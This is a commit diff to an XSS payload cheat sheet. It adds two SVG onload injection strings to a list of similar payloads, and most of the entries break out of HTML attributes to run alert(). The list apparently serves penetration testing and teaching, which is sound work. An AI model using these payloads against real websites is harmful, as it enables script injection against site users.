Update README(Svg payload).md

XSS Injection/README.md

@@ -204,6 +204,8 @@ Most tools are also suitable for blind XSS attacks:
 <svg onload=alert(1)//
 <svg/onload=alert(String.fromCharCode(88,83,83))>
 <svg id=alert(1) onload=eval(id)>
+"><svg onload=alert(1)>
+"><svg onload=alert('XSS')>
 "><svg/onload=alert(String.fromCharCode(88,83,83))>
 "><svg/onload=alert(/XSS/)
 <svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
@@ -616,4 +618,4 @@ Technical blogposts available at
 - [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
 - [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
 - [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://klikki.fi/adv/yahoo.html)
-- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)
+- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)